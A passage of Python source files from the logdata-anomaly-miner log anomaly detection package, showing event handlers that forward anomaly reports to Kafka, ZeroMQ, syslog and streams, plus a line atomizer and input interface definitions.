log_data['AnnotatedMatchElement'][path] = str(match.match_object) analysis_component = {'AnalysisComponentIdentifier': self.analysis_context.get_id_by_component(event_source)} if event_source.__class__.__name__ == 'ExtractedData_class': analysis_component['AnalysisComponentType'] = 'DistributionDetector' else: analysis_component['AnalysisComponentType'] = str(event_source.__class__.__name__) analysis_component['AnalysisComponentName'] = self.analysis_context.get_name_by_component(event_source) analysis_component['Message'] = event_message if hasattr(event_source, "persistence_id"): analysis_component['PersistenceFileName'] = event_source.persistence_id if hasattr(event_source, 'learn_mode'): analysis_component['TrainingMode'] = event_source.learn_mode detector_analysis_component = event_data.get('AnalysisComponent') if detector_analysis_component is not None: for key in detector_analysis_component: if key in analysis_component: continue analysis_component[key] = detector_analysis_component.get(key) if 'LogData' not in event_data: event_data['LogData'] = log_data event_data['AnalysisComponent'] = analysis_component if self.pretty_print is True: json_data = json.dumps(event_data, indent=2) else: json_data = json.dumps(event_data) res = [''] * len(sorted_loglines) res[0] = str(json_data) for listener in self.json_event_handlers: if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None \ and listener not in event_source.output_event_handlers: event_source = copy.copy(event_source) event_source.output_event_handlers.append(listener) listener.receive_event(event_type, None, res, json_data, log_atom, event_source) KafkaEventHandler.py000066400000000000000000000100231437606560100343170ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/events""" This module defines an event handler that forwards Json-objects to Kafka. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import sys import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.events.EventInterfaces import EventHandlerInterface class KafkaEventHandler(EventHandlerInterface): """This class implements an event record listener, that will forward Json-objects to a Kafka queue.""" def __init__(self, analysis_context, topic, options): """ Initialize the event handler. @param analysis_context the analysis context used to get the component. @param topic the Kafka topic to which the data is sent. @param options Kafka specific options. """ self.analysis_context = analysis_context self.options = options self.topic = topic self.producer = None self.kafka_imported = False def receive_event(self, _event_type, _event_message, _sorted_loglines, event_data, _log_atom, event_source): """ Receive information about a detected event in json format. @param _event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param _event_message the first output line of the event. @param _sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param _log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ if hasattr(event_source, 'output_event_handlers') and event_source.output_event_handlers is not None and self not in \ event_source.output_event_handlers: return True component_name = self.analysis_context.get_name_by_component(event_source) if component_name in self.analysis_context.suppress_detector_list: return True if self.kafka_imported is False: try: from kafka import KafkaProducer from kafka.errors import KafkaError self.producer = KafkaProducer(**self.options, value_serializer=lambda v: v.encode()) self.kafka_imported = True except ImportError: msg = 'Kafka module not found.' logging.getLogger(DEBUG_LOG_NAME).error(msg) print('ERROR: ' + msg, file=sys.stderr) return False if not isinstance(event_data, str) and not isinstance(event_data, bytes): msg = 'KafkaEventHandler received non-string event data. Use the JsonConverterHandler to serialize it first.' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) return False try: self.producer.send(self.topic, event_data) except KafkaError as err: msg = str(err) logging.getLogger(DEBUG_LOG_NAME).error(msg) print("Error: " + msg, file=sys.stderr) self.producer.close() self.producer = None return False return True ScoringEventHandler.py000066400000000000000000000144161437606560100347200ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/events""" This module defines an event handler that adds a confidence score to the anomaly output. The score is calculated through analysis of a list of strings defined in the detector through the function get_weight_analysis_field_path and weights the single strings based on the weights dictionary. The weights can optionally be automatically calculated. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import copy from aminer.events.EventInterfaces import EventHandlerInterface from aminer.events.EventInterfaces import EventSourceInterface class ScoringEventHandler(EventHandlerInterface): """This class implements an event record listener, that will add a confidence score to the anomaly output.""" def __init__(self, event_handlers, analysis_context, weights=None, auto_weights=False, auto_weights_history_length=1000): """ Initialize the ScoringEventHandler component. @param weights A dictionary that specifies the weights of values for the scoring. The keys are the strings of the analyzed list and the corresponding values are the assigned weights. Strings that are not present in this dictionary have the weight 0.5 if not automatically weighted. @param auto_weights boolean value that states if the weights should be automatically calculated through the formula 10 / (10 + number of value appearances). @param auto_weights_history_length integer value that specifies the number of values that are considered in the calculation of the weights. """ self.analysis_context = analysis_context self.event_handlers = event_handlers self.weights = weights self.auto_weights = auto_weights self.auto_weights_history_length = auto_weights_history_length if self.auto_weights: self.history_list = [[] for _ in range(self.auto_weights_history_length)] self.history_list_index = 0 def receive_event(self, event_type, event_message, sorted_log_lines, event_data, log_atom, event_source): """Receive information about a detected event.""" # Initialize path_valid variable that states if the path to the analysis field is valid path_valid = True # Get the path to the analysis and output fields from the event_source or set the paths to empty lists if not if isinstance(event_source, EventSourceInterface): analysis_field_path = event_source.get_weight_analysis_field_path() output_field_path = event_source.get_weight_output_field_path() else: analysis_field_path = [] output_field_path = [] # Check if the analysis field path is not empty and get the analyis list or set path_valid to False if analysis_field_path == []: path_valid = False else: analyis_list = event_data # Traverse the path of the analysis_field_path in event_data for path in analysis_field_path: if path in analyis_list: # Go a step in the event_data analyis_list = analyis_list[path] else: # Set path_valid to False and stop if the path does not match the structure of event_data path_valid = False break # Calculate and add the confidence to the output if the path is valid if path_valid: event_data_confidence = event_data # Traverse the path of the output_field_path in event_data for path in output_field_path[:-1]: # Create a new dictionary if the path does not exist if path not in event_data_confidence: event_data_confidence[path] = {} # Go a step in the event_data event_data_confidence = event_data_confidence[path] # Calculate the absolute confidence confidence_absolut = sum(self.get_weight(val) for val in analyis_list) # Add the the absolute and mean confidence to the message event_data_confidence[output_field_path[-1]] = {'confidence_absolut': confidence_absolut, 'confidence_mean': confidence_absolut / len(analyis_list)} # Update the history list and increase the count index if self.auto_weights: self.history_list[self.history_list_index] = analyis_list self.history_list_index += 1 if self.history_list_index >= self.auto_weights_history_length: self.history_list_index %= self.auto_weights_history_length # Send the message to the following event handlers for listener in self.event_handlers: if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None \ and listener not in event_source.output_event_handlers: event_source = copy.copy(event_source) event_source.output_event_handlers.append(listener) listener.receive_event(event_type, event_message, sorted_log_lines, event_data, log_atom, event_source) def get_weight(self, value): """Return the weight of the value parameter.""" if self.weights is not None and value in self.weights: # Return the specified weight if the value is in the weight list return self.weights[value] if not self.auto_weights: # Return 0.5 if the value is not in the weigth list and the weights are not automatically calculated return 0.5 # Else calculate the weight through 10 / (10 + number of value appearances) return 10 / (10 + sum(value in value_list for value_list in self.history_list)) StreamPrinterEventHandler.py000066400000000000000000000061031437606560100361050ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/events""" This module defines an event handler that prints data to a stream. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import sys from aminer.events.EventInterfaces import EventHandlerInterface from aminer.events.EventData import EventData class StreamPrinterEventHandler(EventHandlerInterface): """ This class implements an event record listener, that will just print out data about the event to a stream. By default this is stdout. """ def __init__(self, analysis_context, stream=sys.stdout): """ Initialize the event handler. @param analysis_context the analysis context used to get the component. @param stream the output stream of the event handler. """ self.analysis_context = analysis_context self.stream = stream def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected event. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ if hasattr(event_source, 'output_event_handlers') and event_source.output_event_handlers is not None and self not in \ event_source.output_event_handlers: return component_name = self.analysis_context.get_name_by_component(event_source) if component_name in self.analysis_context.suppress_detector_list: return event_data_obj = EventData(event_type, event_message, sorted_loglines, event_data, log_atom, event_source, self.analysis_context) message = f'{event_data_obj.receive_event_string()}\n' if hasattr(self.stream, 'buffer'): self.stream.buffer.write(message.encode()) else: self.stream.write(message) self.stream.flush() SyslogWriterEventHandler.py000066400000000000000000000101271437606560100357640ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/events""" This module defines an event handler that prints data to a local syslog instance. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import io import os import syslog from aminer.events.EventInterfaces import EventHandlerInterface from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler class SyslogWriterEventHandler(EventHandlerInterface): """ This class implements an event record listener to forward events to the local syslog instance. CAVEAT: USE THIS AT YOUR OWN RISK: by creating aminer/syslog log data processing loops, you will flood your syslog and probably fill up your disks. """ def __init__(self, analysis_context, instance_name='aminer'): """ Initialize the event handler. @param analysis_context the analysis context used to get the component. @param instance_name the process name shown in the syslog. """ self.analysis_context = analysis_context self.instanceName = instance_name syslog.openlog(f'{self.instanceName}[{os.getpid()}]', syslog.LOG_INFO, syslog.LOG_DAEMON) syslog.syslog(syslog.LOG_INFO, 'Syslog logger initialized') self.buffer_stream = io.StringIO() self.event_writer = StreamPrinterEventHandler(analysis_context, self.buffer_stream) self.event_id = 0 def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected even and forward it to syslog. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ if hasattr(event_source, 'output_event_handlers') and event_source.output_event_handlers is not None and self not in \ event_source.output_event_handlers: return component_name = self.analysis_context.get_name_by_component(event_source) if component_name in self.analysis_context.suppress_detector_list: return self.buffer_stream.seek(0) self.buffer_stream.truncate(0) self.event_writer.receive_event(event_type, event_message, sorted_loglines, event_data, log_atom, event_source) event_data = self.buffer_stream.getvalue() current_event_id = self.event_id self.event_id += 1 serial = 0 for data_line in event_data.strip().split('\n'): # Python syslog is very ugly if lines are too long, so break them down. while data_line: message = None if serial == 0: message = f'[{current_event_id}] {data_line[:800]}' else: message = f'[{current_event_id}-{serial}] {data_line[:800]}' data_line = data_line[800:] syslog.syslog(syslog.LOG_INFO, message) serial += 1 logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/events/Utils.py000066400000000000000000000050451437606560100321710ustar00rootroot00000000000000""" This module defines a handler for storing event history. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.events.EventInterfaces import EventHandlerInterface from aminer.util.History import LogarithmicBackoffHistory class VolatileLogarithmicBackoffEventHistory(EventHandlerInterface, LogarithmicBackoffHistory): """ This class is a volatile filter to keep a history of received events. Example usages are for analysis by other components or for external access via remote control interface. """ def __init__(self, max_items): """ Initialize the history component. @param max_items the maximum number of items in the event history. """ LogarithmicBackoffHistory.__init__(self, max_items) self.event_id = 0 def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected event and store all related data as tuple to the history log. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ self.add_object((self.event_id, event_type, event_message, sorted_loglines, event_data, log_atom, event_source)) self.event_id += 1 return True ZmqEventHandler.py000066400000000000000000000112011437606560100340500ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/events""" This module defines an event handler that forwards anomalies to ZeroMQ. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import sys import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.events.EventInterfaces import EventHandlerInterface import zmq class ZmqEventHandler(EventHandlerInterface): """This class implements an event record listener, that will forward Json-objects to a ZeroMQ queue.""" def __init__(self, analysis_context, topic=None, url="ipc:///tmp/aminer"): """ Initialize the event handler. @param analysis_context the analysis context used to get the component. @param topic the topic used in the Zero Message Queue. @param url the internal inter process communication channel. """ self.analysis_context = analysis_context self.url = url self.topic = topic self.producer = None self.context = None self.zmq_imported = False logging.getLogger(DEBUG_LOG_NAME).info("ZmqEventHandler initialized") def receive_event(self, _event_type, _event_message, _sorted_loglines, event_data, _log_atom, event_source): """ Receive information about a detected event in json format. Receive information about a detected event in json format. @param _event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param _event_message the first output line of the event. @param _sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param _log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ if hasattr(event_source, 'output_event_handlers') and event_source.output_event_handlers is not None and self not in \ event_source.output_event_handlers: return True component_name = self.analysis_context.get_name_by_component(event_source) if component_name in self.analysis_context.suppress_detector_list: return True if self.zmq_imported is False: try: self.context = zmq.Context() # skipcq: PYL-E0110 self.producer = self.context.socket(zmq.PUB) self.producer.bind(self.url) logging.getLogger(DEBUG_LOG_NAME).info("Created socket on %s", self.url) self.zmq_imported = True except ImportError: msg = 'ZeroMQ module not found.' logging.getLogger(DEBUG_LOG_NAME).error(msg) print('ERROR: ' + msg, file=sys.stderr) return False if not isinstance(event_data, str) and not isinstance(event_data, bytes): msg = 'ZmqEventHandler received non-string event data. Use the JsonConverterHandler to serialize it first.' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) return False try: if self.topic: self.producer.send_string(self.topic, flags=zmq.SNDMORE) # please note that if the JsonConvertHandler was used(json: true) # then it is possible to use the socket.recv_json() for the # consumer. recv_json() will decode the json-string self.producer.send_string(event_data) except zmq.ZMQError as err: msg = str(err) logging.getLogger(DEBUG_LOG_NAME).error(msg) print("Error: " + msg, file=sys.stderr) self.producer.disconnect() self.producer = None self.zmq_imported = False return False return True logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/input/000077500000000000000000000000001437606560100303465ustar00rootroot00000000000000ByteStreamLineAtomizer.py000066400000000000000000000232001437606560100352400ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/input""" This module provides support for splitting a data stream into atoms, perform parsing and forward the results. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging import sys from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.input.LogAtom import LogAtom from aminer.input.InputInterfaces import StreamAtomizer from aminer.input.JsonStateMachine import json_machine from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ParserMatch import ParserMatch breakout = False data = None line = None def found_json(_data): """Set the breakout variable if the JsonStateMachine finished.""" global breakout # skipcq: PYL-W0603 breakout = True global data # skipcq: PYL-W0603 data = _data class ByteStreamLineAtomizer(StreamAtomizer): """ This atomizer consumes binary data from a stream to break it into lines, removing the line separator at the end. With a parsing model, it will also perform line parsing. Failures in atomizing or parsing will cause events to be generated and sent to event handler. Data will be consumed only when there was no downstream handler registered (the data will be discarded in that case) or when at least one downstream consumed the data. """ COUNTER = 0 def __init__(self, parsing_model, atom_handler_list, event_handler_list, max_line_length, default_timestamp_path_list, eol_sep=b'\n', json_format=False): """ Create the atomizer. @param event_handler_list when not None, send events to those handlers. The list might be empty at invocation and populated later on. @param max_line_length the maximal line length including the final line separator. """ self.parsing_model = parsing_model self.atom_handler_list = atom_handler_list self.event_handler_list = event_handler_list self.max_line_length = max_line_length self.default_timestamp_path_list = default_timestamp_path_list if not isinstance(eol_sep, bytes): msg = f'{self.__class__.__name__} eol_sep parameter must be of type bytes!' print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) sys.exit(-1) self.eol_sep = eol_sep self.json_format = json_format self.in_overlong_line_flag = False # If consuming of data was already attempted but the downstream handlers refused to handle it, keep the data and the parsed # object to avoid expensive duplicate parsing operation. The data does not include the line separators any more. self.last_unconsumed_log_atom = None def consume_data(self, stream_data, end_of_stream_flag=False): """ Consume data from the underlying stream for atomizing. @return the number of consumed bytes, 0 if the atomizer would need more data for a complete atom or -1 when no data was consumed at the moment but data might be consumed later on. """ # Loop until as much streamData as possible was processed and then return a result. The correct processing of endOfStreamFlag # is tricky: by default, even when all data was processed, do one more iteration to handle also the flag. consumed_length = 0 while True: if self.last_unconsumed_log_atom is not None: # Keep length before dispatching: dispatch will reset the field. data_length = len(self.last_unconsumed_log_atom.raw_data) if self.dispatch_atom(self.last_unconsumed_log_atom): consumed_length += data_length + len(self.eol_sep) continue # Nothing consumed, tell upstream to wait if appropriate. if consumed_length == 0: consumed_length = -1 break line_end = None global breakout # skipcq: PYL-W0603 breakout = False global data # skipcq: PYL-W0603 data = None valid_json = False if self.json_format: state = json_machine(found_json) i = 0 for i, char in enumerate(stream_data[consumed_length:]): state = state(char) if breakout or state is None or i > self.max_line_length: break # check if the json is still valid, but the stream_data is at the end if not breakout and state is not None and i + consumed_length == len(stream_data) - 1 and not end_of_stream_flag: return consumed_length if 0 < i <= self.max_line_length and b'{' in stream_data[consumed_length:consumed_length+i+1] and data is not None: line_end = consumed_length + i + 1 valid_json = True elif i > self.max_line_length: self.in_overlong_line_flag = True if line_end is None: line_end = stream_data.find(self.eol_sep, consumed_length) if self.in_overlong_line_flag: if line_end < 0: consumed_length = len(stream_data) if end_of_stream_flag: self.dispatch_event('Overlong line terminated by end of stream', stream_data) self.in_overlong_line_flag = False break consumed_length = line_end + len(self.eol_sep) self.in_overlong_line_flag = False continue # This is the valid start of a normal/incomplete/overlong line. if line_end < 0: tail_length = len(stream_data) - consumed_length if tail_length > self.max_line_length: self.dispatch_event('Start of overlong line detected', stream_data[consumed_length:]) self.in_overlong_line_flag = True consumed_length = len(stream_data) # Stay in loop to handle also endOfStreamFlag! continue if end_of_stream_flag and (tail_length != 0): self.dispatch_event('Incomplete last line', stream_data[consumed_length:]) consumed_length = len(stream_data) break # This is at least a complete/overlong line. line_length = line_end + len(self.eol_sep) - consumed_length if line_length > self.max_line_length and not valid_json: self.dispatch_event('Overlong line detected', stream_data[consumed_length:line_end]) consumed_length = line_end + len(self.eol_sep) continue # This is a normal line. line_data = stream_data[consumed_length:line_end] log_atom = LogAtom(line_data, None, None, self) if self.parsing_model is not None: match_context = MatchContext(line_data) match_element = self.parsing_model.get_match_element('', match_context) if (match_element is not None) and not match_context.match_data: log_atom.parser_match = ParserMatch(match_element) for default_timestamp_path in self.default_timestamp_path_list: ts_match = log_atom.parser_match.get_match_dictionary().get(default_timestamp_path, None) if ts_match is not None: log_atom.set_timestamp(ts_match.match_object) break if self.dispatch_atom(log_atom): consumed_length = line_end + len(self.eol_sep) - ( valid_json and stream_data[line_end:line_end+len(self.eol_sep)] != self.eol_sep) continue if consumed_length == 0: # Downstream did not want the data, so tell upstream to block for a while. consumed_length = -1 break return consumed_length def dispatch_atom(self, log_atom): """Dispatch the data using the appropriate handlers. Also clean or set lastUnconsumed fields depending on outcome of dispatching.""" type(self).COUNTER = type(self).COUNTER + 1 if self.COUNTER % 1000 == 0 and self.COUNTER != 0: logging.getLogger(DEBUG_LOG_NAME).info("%d log atoms were processed totally.", self.COUNTER) was_consumed_flag = False if not self.atom_handler_list: was_consumed_flag = True else: for handler in self.atom_handler_list: if handler.receive_atom(log_atom): was_consumed_flag = True if was_consumed_flag: self.last_unconsumed_log_atom = None else: self.last_unconsumed_log_atom = log_atom return was_consumed_flag def dispatch_event(self, message, line_data): """Dispatch an event with given message and line data to all event handlers.""" if self.event_handler_list is None: return for handler in self.event_handler_list: handler.receive_event(f'Input.{self.__class__.__name__}', message, [line_data], None, None, self) InputInterfaces.py000066400000000000000000000370311437606560100337500ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/input""" This file contains interface definition useful implemented by classes in this directory and for use from code outside this directory. All classes are defined in separate files, only the namespace references are added here to simplify the code. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import abc import time import logging from aminer.AminerConfig import STAT_LOG_NAME, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer import AminerConfig class AtomizerFactory(metaclass=abc.ABCMeta): """ This is the common interface of all factories to create atomizers for new data sources. These atomizers are integrated into the downstream processing pipeline. """ @abc.abstractmethod def get_atomizer_for_resource(self, resource_name): """ Get an atomizer for a given resource. @return a StreamAtomizer object """ class StreamAtomizer(metaclass=abc.ABCMeta): """ This is the common interface of all binary stream atomizers. Atomizers in general should be good detecting and reporting malformed atoms but continue to function by attempting error correction or resynchronization with the stream after the bad atom. This type of atomizer also signals a stream source when the stream data cannot be handled at the moment to throttle reading of the underlying stream. """ @abc.abstractmethod def consume_data(self, stream_data, end_of_stream_flag=False): """ Consume data from the underlying stream for atomizing. Data should only be consumed after splitting of an atom. The caller has to keep unconsumed data till the next invocation. @param stream_data the data offered to be consumed or zero length data when endOfStreamFlag is True (see below). @param end_of_stream_flag this flag is used to indicate, that the streamData offered is the last from the input stream. If the streamData does not form a complete atom, no rollover is expected or rollover would have honoured the atom boundaries, then the StreamAtomizer should treat that as an error. With rollover, consuming of the stream end data will signal the invoker to continue with data from next stream. When end of stream was reached but invoker has no streamData to send, it will invoke this method with zero-length data, which has to be consumed with a zero-length reply. @return the number of consumed bytes, 0 if the atomizer would need more data for a complete atom or -1 when no data was consumed at the moment but data might be consumed later on. The only situation where 0 is not an allowed return value is when end_of_stream_flag is set and stream_data not empty. """ class AtomHandlerInterface(metaclass=abc.ABCMeta): """This is the common interface of all handlers suitable for receiving log atoms.""" output_event_handlers = None def __init__(self, mutable_default_args=None, learn_mode=None, stop_learning_time=None, stop_learning_no_anomaly_time=None, stop_when_handled_flag=None, **kwargs): """Initialize the parameters of analysis components. See the classes of the analysis components for parameter descriptions.""" allowed_kwargs = [ "mutable_default_args", "aminer_config", "anomaly_event_handlers", "learn_mode", "persistence_id", "id_path_list", "stop_learning_time", "stop_learning_no_anomaly_time", "output_logline", "target_path_list", "constraint_list", "ignore_list", "allowlist_rules", "subhandler_list", "stop_when_handled_flag", "parsed_atom_handler_lookup_list", "default_parsed_atom_handler", "target_path", "parsed_atom_handler_dict", "allow_missing_values_flag", "tuple_transformation_function", "prob_thresh", "skip_repetitions", "max_hypotheses", "hypothesis_max_delta_time", "generation_probability", "generation_factor", "max_observations", "p0", "alpha", "candidates_size", "hypotheses_eval_delta_time", "delta_time_to_discard_hypothesis", "check_rules_flag", "window_size", "scoring_path_list", "num_windows", "confidence_factor", "empty_window_warnings", "early_exceeding_anomaly_output", "set_lower_limit", "set_upper_limit", "local_maximum_threshold", "seq_len", "allow_missing_id", "timeout", "allowed_id_tuples", "min_num_vals", "max_num_vals", "save_values", "track_time_for_tsa", "waiting_time", "num_sections_waiting_time", "histogram_definitions", "report_interval", "reset_after_report_flag", "bin_definition", "target_value_list", "timestamp_path", "min_bin_elements", "min_bin_time", "debug_mode", "stream", "separator", "missing_value_string", "num_log_lines_solidify_matrix", "time_output_threshold", "anomaly_threshold", "default_interval", "realert_interval", "combine_values", "min_allowed_time_diff", "target_label_list", "split_reports_flag", "event_type_detector", "num_init", "force_period_length", "set_period_length", "alpha_bt", "num_results_bt", "num_min_time_history", "num_max_time_history", "num_periods_tsa_ini", "time_period_length", "max_time_diff", "num_reduce_time_list", "min_anomaly_score", "min_variance", "parallel_check_count", "record_count_before_event", "use_path_match", "use_value_match", "min_rule_attributes", "max_rule_attributes", "ruleset", "exit_on_error_flag", "acf_pause_interval_percentage", "acf_auto_pause_interval", "acf_auto_pause_interval_num_min", "build_sum_over_values", "num_division_time_step", "acf_threshold", "round_time_interval_threshold", "min_log_lines_per_time_step", "num_update", "disc_div_thres", "num_steps_create_new_rules", "num_upd_until_validation", "num_end_learning_phase", "check_cor_thres", "check_cor_prob_thres", "check_cor_num_thres", "min_values_cors_thres", "new_vals_alarm_thres", "num_bt", "used_homogeneity_test", "alpha_chisquare_test", "max_dist_rule_distr", "used_presel_meth", "intersect_presel_meth", "percentage_random_cors", "match_disc_vals_sim_tresh", "exclude_due_distr_lower_limit", "match_disc_distr_threshold", "used_cor_meth", "used_validate_cor_meth", "validate_cor_cover_vals_thres", "validate_cor_distinct_thres", "used_gof_test", "gof_alpha", "s_gof_alpha", "s_gof_bt_alpha", "d_alpha", "d_bt_alpha", "div_thres", "sim_thres", "indicator_thres", "num_update_unq", "num_s_gof_values", "num_s_gof_bt", "num_d_bt", "num_pause_discrete", "num_pause_others", "test_gof_int", "num_stop_update", "silence_output_without_confidence", "silence_output_except_indicator", "num_var_type_hist_ref", "num_update_var_type_hist_ref", "num_var_type_considered_ind", "num_stat_stop_update", "num_updates_until_var_reduction", "var_reduction_thres", "num_skipped_ind_for_weights", "num_ind_for_weights", "used_multinomial_test", "use_empiric_distr", "used_range_test", "range_alpha", "range_threshold", "num_reinit_range", "range_limits_factor", "dw_alpha", "save_statistics", "idf", "norm", "add_normal", "check_empty_windows", "unique_path_list" ] self.log_success = 0 self.log_total = 0 self.persistence_id = None # persistence_id is always needed. for argument, value in list(locals().items())[1:-1]: # skip self parameter and kwargs if value is not None: setattr(self, argument, value) for argument, value in kwargs.items(): # skip self parameter and kwargs if argument not in allowed_kwargs: msg = f"Argument {argument} is unknown. Consider changing it or adding it to the allowed_kwargs list." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) setattr(self, argument, value) if learn_mode is False and (stop_learning_time is not None or stop_learning_no_anomaly_time is not None): msg = "It is not possible to use the stop_learning_time or stop_learning_no_anomaly_time when the learn_mode is False." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if stop_learning_time is not None and stop_learning_no_anomaly_time is not None: msg = "stop_learning_time is mutually exclusive to stop_learning_no_anomaly_time. Only one of these attributes may be used." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not isinstance(stop_learning_time, (type(None), int)): msg = "stop_learning_time has to be of the type int or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not isinstance(stop_learning_no_anomaly_time, (type(None), int)): msg = "stop_learning_no_anomaly_time has to be of the type int or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.stop_learning_timestamp = None if stop_learning_time is not None: self.stop_learning_timestamp = time.time() + stop_learning_time self.stop_learning_no_anomaly_time = stop_learning_no_anomaly_time if stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + stop_learning_no_anomaly_time if hasattr(self, "aminer_config"): self.next_persist_time = time.time() + self.aminer_config.config_properties.get( KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) if mutable_default_args is not 